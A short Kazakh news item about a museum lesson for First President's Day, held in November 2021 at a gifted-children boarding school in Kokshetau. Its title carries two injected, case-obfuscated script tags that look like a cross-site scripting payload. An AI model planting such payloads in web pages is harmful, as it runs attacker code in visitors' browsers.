«Елбасы күні- елдікке құрмет» атты музейлік сабақ<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

30.11.2021

2021 жылдың 29 қарашасында Көкшетау қаласы, Абай атындағы дарынды балаларға арналған № 3 облыстық мамандандырылған мектеп-интернатында Көкшетау қаласының тарихы музейінің қызметкерлерінің ұйымдастыруымен Қазақстан Республикасының Тұңғыш Президент күніне арналған «Елбасы күні- елдікке құрмет» атты музейлік сабақ өткізілді. Сабақ барысында оқушылар Елбасының тәуелсіздік жылдарында Көкшетау қаласына келген іс-сапарларынан фотокөрмені тамашалап, туған елге сіңірген еңбегі туралы мағлұмат алды. Елбасының балалық шағынан кемеңгер жасына дейінгі өнегелі жолына слайд арқылы бейнешолу жасалды. Тұңғыш президентіміз Нұрсұлтан Назарбаевтың өмір жолына шолу жасау мақсатында оқушылар викториналық сұрақтарға жауап беріп, білімдерін қорытындылады. Іс-шара соңында оқушылар Елбасына арнаған өлеңдерін оқып, игі тілектерін білдірді.

Просмотров: 752


Пікір қосу



Деректерді қолтаңбаға қосу